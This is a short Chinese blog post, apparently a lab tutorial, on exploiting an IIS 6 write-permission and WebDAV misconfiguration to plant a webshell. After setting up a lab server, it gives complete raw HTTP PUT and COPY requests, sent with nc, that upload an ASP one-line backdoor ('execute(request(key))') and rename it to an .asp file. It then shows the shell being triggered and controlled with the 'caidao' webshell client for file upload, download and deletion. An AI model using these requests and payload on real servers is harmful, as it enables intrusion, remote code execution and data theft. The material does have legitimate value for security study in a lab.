IIS写权限漏洞获取Webshell

怼烎@ 2023-10-10 19:43 59阅读 0赞

服务安装

IIS服务器属于Windows平台,建议使用windows Server 2003或2008系统。

在系统启动菜单中运行IIS,如果没有该选项,说明iis没有进行默认安装,可以通过“控制面板”-“添加或删除程序”手动进行安装。

a4949aea705b40f698118e132e79240d.png

以此选择“添加/删除组件”-“应用程序服务器”

2a567f1b50884a4fba2325d328d20377.png

属性配置

环境搭好后,需要进行一些默认配置,在管理工具中,找到Internet信息服务管理器

e5f3db1e6e524345ba9d98bfcc9ea2e0.png

进入后找到默认网站,右键属性

e98f4d1b6e0d4369ae072eafb303bfb4.png

在弹出的窗口打开主目录,并勾选“脚本资源访问”和“写入”

09bc25a6d9da47c58ec8f003b6b2cf53.png

在“Web服务扩展”中,将“Active Server Pages” ,“WebDAV”两个选项设置为允许。

17ad0f672cf743cfa31432f5f6f28bb3.png

其中,Active ServerPages为ASP的全称,对于一般的ASP服务来说,该选项是必须要启用的,否则网站仅支持HTML,JPG等静态资源。而WebDAV是漏洞成因之一,必须手动开启。

修改完配置后,需要重启iis服务,选择默认网站,点机上方停止按钮,再点机启动按钮。

6cade8209007431ab5e0da18719a17d9.png

构造请求

开启配置后,可以使用NC或burpsuite构造http请求来完成,或者直接使用工具。(这里使用nc构造请求)。

  1. 首先构造PUT请求,创建put.txt文件,请求的http报文如下:

请求内容为:上传一个2.txt文件,到192.168.249.140,文件内容为<%execute(request(“key”))%>

  1. PUT /2.txt HTTP/1.1
  2. Host:192.168.249.140
  3. Content-Length:31
  4. <%execute(request("key"))%>
  5. /r/n
  6. /r/n #末尾有两个连续的换行

如图所示

de85e587e877416ba73a5cbc73a1d1bc.png

2.使用nc发起请求,命令如下

  1. nc 192.168.249.140 80 <put.txt

返回201 ,内容如下

7572486fc50a4a10aebe202357826614.png

3.接着发起COPY请求,需新建copy.txt,文件内容如下(注末尾有两个连续的换行)

  1. COPY /2.txt HTTP/1.1
  2. Host:192.168.249.140
  3. Destination:http://192.168.249.140/2.asp

发送请求

  1. nc 192.168.249.140 80 <copy.txt

fdcc6291a48a4440a3f57f037865b8af.png

请求完成,同样返回201 Created ,说明已经成功获取到Webshell

4.在浏览器中进行验证

  1. http://192.168.249.140/2.asp?key=Response.Write(“hello”)

浏览器成功打印 “hello”

97cd324285344c1f812c34fdff16799f.png

5.对于一句话木马的利用,还可以使用webshell工具进行连接,这里使用“菜刀”连接

填写shell地址和连接密码

64a542dcad5b49ffbb816d869c8345f2.png

连接成功后,可以通过菜刀看到网站目录下的文件结构,同时还可以使用编辑,上传文件,下载,删除文件等功能

6bf078877e01436fa79b91a3e7d64d8c.png

发表评论

表情:
评论列表 (有 0 条评论,59人围观)

还没有评论,来说两句吧...

相关阅读